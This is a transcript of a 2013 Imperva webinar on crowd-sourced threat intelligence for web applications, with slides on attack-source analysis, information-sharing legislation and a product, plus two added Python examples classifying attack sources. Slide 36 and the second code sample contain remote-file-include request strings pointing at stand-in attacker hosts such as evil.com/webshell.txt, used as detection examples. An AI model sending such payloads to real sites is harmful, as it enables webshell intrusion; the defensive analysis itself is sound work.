The Value of Crowd-Sourced Threat Intelligence

Description

On April 3, CNBC reported the details of a large-scale attack campaign targeting the banking industry. As a result of this campaign, multiple U.S. banks experienced website outages totaling 249 hours over a six-week period. Would the damage from the attack campaign have been reduced if the banks had been able to share crowd-sourced threat intelligence? Imperva's Application Defense Center (ADC) recently analyzed real-world traffic from sixty Web applications to identify attack patterns. The results of the study demonstrate how sharing attack patterns across a community of Web applications can significantly mitigate the risk of large-scale attack campaigns. This presentation will: identify how cross-site information sharing (crowd-sourcing) creates security intelligence, demonstrate the value of adding crowd-sourced intelligence to Web application security, and provide real-world examples of attack patterns that can be shared for community defense.

Transcript of The Value of Crowd-Sourced Threat Intelligence

Page 1: The Value of Crowd-Sourced Threat Intelligence

© 2013 Imperva, Inc. All rights reserved.

Crowd Sourced Threat Intelligence

Amichai Shulman, CTO, Imperva

Confidential 1

May 2013

Page 2: The Value of Crowd-Sourced Threat Intelligence

Agenda

§ Introduction to crowd sourcing and threat intelligence
§ Application layer threat intelligence
  • Research report
§ Actionable threat intelligence
  • Turning threat intelligence into community defense
§ Threat intelligence and legislation
  • Pros, Cons and Etat D’Affaire
§ Summary & conclusions
§ Q&A

Page 3: The Value of Crowd-Sourced Threat Intelligence

Amichai Shulman – CTO Imperva

§ Speaker at industry events
  • RSA, Appsec, Info Security UK, Black Hat
§ Lecturer on information security
  • Technion - Israel Institute of Technology
§ Former security consultant to banks & financial services firms
§ Leads the Application Defense Center (ADC)
  • Discovered over 20 commercial application vulnerabilities
§ Credited by Oracle, MS-SQL, IBM and others

Amichai Shulman, one of InfoWorld’s “Top 25 CTOs”

Page 4: The Value of Crowd-Sourced Threat Intelligence

HII Reports

§ The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice
  • A different approach from vulnerability research
§ Data set composition
  • ~60 real-world applications
  • Anonymous proxies
§ More than 24 months of data
§ Powerful analysis system
  • Combines analytic tools with drill-down capabilities

Page 5: The Value of Crowd-Sourced Threat Intelligence

Introduction

Crowd Sourcing and Threat Information Sharing

Page 6: The Value of Crowd-Sourced Threat Intelligence

What is Crowd Sourcing

§ “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*

Page 7: The Value of Crowd-Sourced Threat Intelligence

Crowd Sourcing in Practice

Page 8: The Value of Crowd-Sourced Threat Intelligence

Threat Information Sharing

§ AV vendor customers sharing suspicious files with their vendors
  • Manual process
  • If not manual, then how do you define suspicious?
§ Anti-spam vendors collecting email data from all deployments
  • Privacy?
  • Confidentiality
§ Customer groups for sharing battle stories
  • Timely?

Page 9: The Value of Crowd-Sourced Threat Intelligence

Threat Intelligence

§ Infer NEW information regarding future attacks from looking at past attacks
§ Attacks across organizations share common characteristics
  • Sources
  • Techniques
  • Tools
  • Timelines

Page 10: The Value of Crowd-Sourced Threat Intelligence

Application Layer Threat Intelligence

Research report

Page 11: The Value of Crowd-Sourced Threat Intelligence

Some Observations

§ Most web attacks are part of large-scale industrialized operations
  • Reuse of attack platforms
  • Reuse of techniques
  • Reuse of tools
§ Attack campaigns span meaningful time frames

Page 12: The Value of Crowd-Sourced Threat Intelligence

More Observations

§ Izzadin Kassam attacks on US banks
  • Started with a few banks 4 months ago
  • Gradually adding more targets to the list
§ #OpIsrael / #OpUSA / #OpColombia …
  • Attacks by hacktivists
  • Targeted for a specific time frame
  • Pick up many victims and target them with the SAME exact tools over the attack time frame

Page 13: The Value of Crowd-Sourced Threat Intelligence

Methodology

§ Attack data only
  • 60 applications
  • 6 months of data
§ Analyze dominant attack types
  • SQL Injection
  • Remote File Include
  • Comment Spam
  • Local File Include
  • Directory Traversal

Page 14: The Value of Crowd-Sourced Threat Intelligence

SQL Injection – Source Threat Quadrant

[Figure: source threat quadrant. Sources are placed by how many targets they hit and how long they remain active, giving four regions: multi target, persistent sources; multi target sources; persistent sources; singletons]
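The source threat quadrant above sorts attack sources on two axes: how many different applications a source hits and how long it stays active. The Python below is an added example, not code from the deck or from Imperva's analysis system; the log lines are constructed, and the two thresholds (two or more targets for "multi target", three or more distinct active days for "persistent") are assumptions chosen for illustration. It also computes the share of attack traffic that came from multi-target sources, which is the part of the volume that a shared source reputation list could have warned the other sites about.

```python
"""Source threat quadrant: classify attack sources by target breadth and persistence.

Added example (not Imperva code). The log lines are constructed, and the two
thresholds below are assumptions, not values taken from the research report.
"""
from collections import defaultdict
from datetime import date

# Constructed attack-log sample: date, source IP, target application, attack type
SAMPLE_LOG = """\
2013-01-03 198.51.100.7 shop-a SQLi
2013-01-05 198.51.100.7 bank-b SQLi
2013-01-09 198.51.100.7 shop-c SQLi
2013-01-21 198.51.100.7 bank-b SQLi
2013-01-04 203.0.113.9 shop-a SQLi
2013-01-04 203.0.113.9 bank-b SQLi
2013-01-04 203.0.113.9 shop-c SQLi
2013-01-02 192.0.2.44 shop-a SQLi
2013-01-10 192.0.2.44 shop-a SQLi
2013-01-25 192.0.2.44 shop-a SQLi
2013-01-17 192.0.2.80 bank-b SQLi
"""

MIN_TARGETS = 2      # assumption: "multi target" = hits at least 2 distinct applications
MIN_ACTIVE_DAYS = 3  # assumption: "persistent" = active on at least 3 distinct days


def parse_log(text):
    """Turn the whitespace-separated log into (date, source, target, attack_type) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        day, src, target, kind = line.split()
        events.append((date.fromisoformat(day), src, target, kind))
    return events


def profile_sources(events):
    """Per source: number of distinct targets, distinct active days, and total hits."""
    targets = defaultdict(set)
    days = defaultdict(set)
    hits = defaultdict(int)
    for day, src, target, _ in events:
        targets[src].add(target)
        days[src].add(day)
        hits[src] += 1
    return {
        src: {"targets": len(targets[src]), "days": len(days[src]), "hits": hits[src]}
        for src in hits
    }


def quadrant(profile):
    """Map one source profile onto the four regions of the threat quadrant."""
    multi = profile["targets"] >= MIN_TARGETS
    persistent = profile["days"] >= MIN_ACTIVE_DAYS
    if multi and persistent:
        return "multi-target, persistent"
    if multi:
        return "multi-target"
    if persistent:
        return "persistent"
    return "singleton"


def classify_sources(text):
    """Source IP -> quadrant label for every source in the log."""
    return {src: quadrant(p) for src, p in profile_sources(parse_log(text)).items()}


def community_value(text):
    """Fraction of all hits that came from multi-target sources, i.e. the share of the
    attack volume that another site in the community had already seen and could warn about."""
    profiles = profile_sources(parse_log(text))
    total = sum(p["hits"] for p in profiles.values())
    shared = sum(p["hits"] for p in profiles.values() if p["targets"] >= MIN_TARGETS)
    return shared / total if total else 0.0


if __name__ == "__main__":
    for src, label in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{src:14} {label}")
    print(f"share of hits from multi-target sources: {community_value(SAMPLE_LOG):.2f}")
```

In the constructed sample, 198.51.100.7 hits three applications over four days and lands in the top-right region, 203.0.113.9 hits three applications in a single day (multi-target only), 192.0.2.44 keeps hammering one application (persistent only), and 192.0.2.80 is a singleton. Only the multi-target sources are visible to more than one site, so they are the ones worth exchanging; here they account for 7 of the 11 hits.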

Page 15: The Value of Crowd-Sourced Threat Intelligence

SQL Injection – Source Threat Quadrant

[Figure: the same source threat quadrant, highlighting the multi target, persistent sources]

Page 16: The Value of Crowd-Sourced Threat Intelligence

SQL Injection – Time Perspective

[Chart: SQL injection over time. X axis: dates from 01/01/2013 to 28/02/2013; Y axis: Targets (0 to 18); series: Accumulating, Current]

Page 17: The Value of Crowd-Sourced Threat Intelligence

Comment Spam – Source Threat Quadrant

[Figure: source threat quadrant for comment spam, highlighting the multi target, persistent sources]

Page 18: The Value of Crowd-Sourced Threat Intelligence

Remote File Include – URL Threat Quadrant

[Figure: URL threat quadrant for remote file include, highlighting the multi target, persistent vectors]

Page 19: The Value of Crowd-Sourced Threat Intelligence

Remote File Include - Example

§ Reconnaissance campaign based on a benign URL
  • http://google.com/humans.txt
§ 11 different applications targeted using the same URL
  • 5144 different requests
§ Spread throughout an entire month
§ Next slide shows a network graph of attack sources to targets
  • We can learn about the relationship between attack sources

Page 20: The Value of Crowd-Sourced Threat Intelligence

Remote File Include - Example

[Figure: network graph of attack sources to targets for the humans.txt campaign]

Page 21: The Value of Crowd-Sourced Threat Intelligence

Use of Attack Tools

[Chart: Percentage of Automated Attacks. Y axis: 0% to 100%; X axis: attack types RFI, LFI, SQLi, ComSpm (comment spam), XSS, DT (directory traversal); series: Total Attacks, Automated]

Page 22: The Value of Crowd-Sourced Threat Intelligence

Actionable Threat Intelligence

Turning Threat Intelligence Into Community Defense

Page 23: The Value of Crowd-Sourced Threat Intelligence

Actionable Intelligence Life Cycle

[Diagram: a two-step cycle. Known attack patterns are applied on traffic to identify attackers; the resulting known attackers are applied on traffic to identify new patterns, which feed back into the known attack patterns]

Page 24: The Value of Crowd-Sourced Threat Intelligence

Actionable Threat Intelligence

§ Multiphase
  • Distributed data collection
  • Information extraction
  • Analysis and knowledge generation
  • Knowledge validation
  • Distribution of knowledge to devices
§ Cycle must be completely automated in order to provide value in a timely manner and at scale
  • Not an information sharing hub
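The life cycle on the previous two slides alternates two steps: known attack patterns applied on traffic identify attackers, and the traffic of known attackers yields candidate new patterns, which are validated before being distributed to every device. The Python below is an added example and not ThreatRadar code; the request log is constructed, and the seed pattern and the validation rule are assumptions. It uses RFI as the pattern type (a remote URL passed as a parameter value, the same carrier as the humans.txt reconnaissance example on slide 19) and validates a candidate by requiring that it has been seen against at least two different sites, a stand-in for the deck's check that the remote site is malicious. Running the loop shows the second attacker being picked up only after the pattern learned from the first one has been distributed.

```python
"""Actionable-intelligence loop: known patterns -> known attackers -> new patterns.

Added example, not Imperva/ThreatRadar code. The traffic sample is constructed;
the seed pattern and the MIN_SITES validation rule are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed request log: (source IP, target site, request URL as path + query).
SAMPLE_TRAFFIC = [
    ("198.51.100.7", "site-a", "/index.php?page=http://attacker.example/s1.txt?"),
    ("198.51.100.7", "site-b", "/view.php?tpl=http://attacker.example/s1.txt?"),
    ("198.51.100.7", "site-a", "/index.php?page=http://other.example/humans.txt"),
    ("203.0.113.9", "site-c", "/show.php?inc=http://other.example/humans.txt"),
    ("203.0.113.9", "site-d", "/show.php?inc=http://other.example/humans.txt"),
    ("192.0.2.44", "site-b", "/index.php?page=about"),
    ("192.0.2.80", "site-c", "/index.php?page=http://lonely.example/x.txt"),
]

MIN_SITES = 2  # assumption: a candidate is promoted only if seen against >= 2 distinct sites


def included_urls(request):
    """Information extraction: absolute URLs passed as parameter values (the RFI carrier).
    A trailing '?' is stripped so the same remote file always yields the same pattern."""
    query = urlsplit(request).query
    return [
        value.rstrip("?")
        for _, value in parse_qsl(query, keep_blank_values=True)
        if re.match(r"https?://", value)
    ]


def apply_patterns(traffic, patterns):
    """Step 1: known patterns applied on traffic -> the set of attacker sources."""
    return {src for src, _, req in traffic if any(u in patterns for u in included_urls(req))}


def candidate_patterns(traffic, attackers, known):
    """Step 2: known attackers applied on traffic -> candidate patterns not yet known."""
    candidates = set()
    for src, _, req in traffic:
        if src in attackers:
            candidates.update(u for u in included_urls(req) if u not in known)
    return candidates


def validate(traffic, candidates):
    """Knowledge validation: keep only candidates seen against at least MIN_SITES sites."""
    sites = defaultdict(set)
    for _, site, req in traffic:
        for u in included_urls(req):
            if u in candidates:
                sites[u].add(site)
    return {u for u in candidates if len(sites[u]) >= MIN_SITES}


def run_cycle(traffic, seed_patterns, max_rounds=10):
    """Iterate the loop until no validated pattern is left to distribute."""
    known = set(seed_patterns)
    attackers = set()
    for rounds in range(1, max_rounds + 1):
        attackers = apply_patterns(traffic, known)
        new = validate(traffic, candidate_patterns(traffic, attackers, known))
        if not new:
            return {"patterns": known, "attackers": attackers, "rounds": rounds}
        known |= new  # distribution: validated patterns reach every device before the next round
    return {"patterns": known, "attackers": attackers, "rounds": max_rounds}


if __name__ == "__main__":
    result = run_cycle(SAMPLE_TRAFFIC, {"http://attacker.example/s1.txt"})
    print("rounds:   ", result["rounds"])
    print("attackers:", sorted(result["attackers"]))
    print("patterns: ", sorted(result["patterns"]))
```

With the single seed pattern, round one flags only 198.51.100.7; its other request carries other.example/humans.txt, which three sites have seen, so it is validated and distributed. Round two then flags 203.0.113.9 as well, and the loop stops because nothing new is left. The URL from 192.0.2.80 never becomes a pattern: it came from a source that no known pattern matched, and it was seen against a single site, so neither step of the cycle vouches for it.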

Page 25: The Value of Crowd-Sourced Threat Intelligence

The Cost of Decision Making

§ Problem scale is increasing
  • Number of attacks is constantly growing
  • Number of applications per organization is growing
§ Resources are stagnant
  • No additional headcount (HC)
§ Organizations must reduce the proportion of alerts that require human decision making
§ By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection for a larger portion of the attacks

Page 26: The Value of Crowd-Sourced Threat Intelligence

Threat Intelligence and Legislation

Pros, Cons and Etat D’Affaire

Page 27: The Value of Crowd-Sourced Threat Intelligence

Current Legislation

§ US Cyber Intelligence Sharing and Protection Act (CISPA)
  • Passed late April 2013
  • Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities
  • Addresses issues of eligibility, liability and protection of shared information

Page 28: The Value of Crowd-Sourced Threat Intelligence

Current Legislation

§ UK Cyber Security Information Sharing Partnership (CISP)
  • Launched late March 2013 (piloted through 2012)
  • Sets up procedural and technical grounds for information sharing between private sector and government
  • Comprises an operations room, reporting portal and program definitions
  • Similar program exists for cyber crime (CCRP)

Page 29: The Value of Crowd-Sourced Threat Intelligence

Cons

§ Misuse of information by governments
  • Invade privacy in various ways
  • Otherwise would require court order
§ Information sharing platform
  • Does not provide for extraction of actionable intelligence
§ Governments usually do things the wrong way
  • E.g. the complexity of the STIX language

Page 30: The Value of Crowd-Sourced Threat Intelligence

Pros

§ Regulate how data is being anonymized and protected
§ Encourage more organizations to take part in this effort
  • Achieve better results faster
  • Reduce overall damage to public
§ Standardize on various components

Page 31: The Value of Crowd-Sourced Threat Intelligence

Summary & Conclusions

Page 32: The Value of Crowd-Sourced Threat Intelligence

Summary

§ Threat intelligence has a measurable potential value for Web application attacks
§ Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
§ Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence
  • Not information sharing hubs
  • No manual processes
§ Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic

Page 33: The Value of Crowd-Sourced Threat Intelligence

ThreatRadar Community Defense

Page 34: The Value of Crowd-Sourced Threat Intelligence

ThreatRadar Community Defense

Page 35: The Value of Crowd-Sourced Threat Intelligence

ThreatRadar Community Defense

§ Gathers live attack data from SecureSphere WAFs around the world
§ Distributes attack patterns and reputation data in near-real time

Page 36: The Value of Crowd-Sourced Threat Intelligence

Community Defense – How It Works

[Diagram: Internet user → Web servers protected by SecureSphere → ThreatRadar servers]

1. SecureSphere detects a possible RFI attack, such as the request /vulnerable.php?C=http://evil.com/webshell.txt?
2. Sends event to ThreatRadar Cloud
3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community

Page 37: The Value of Crowd-Sourced Threat Intelligence

Webinar Materials

[Slide links: Post-Webinar Discussions; Answers to Attendee Questions; Webinar Recording Link; Join Group]

Join Imperva LinkedIn Group, Imperva Data Security Direct, for…

Page 38: The Value of Crowd-Sourced Threat Intelligence

www.imperva.com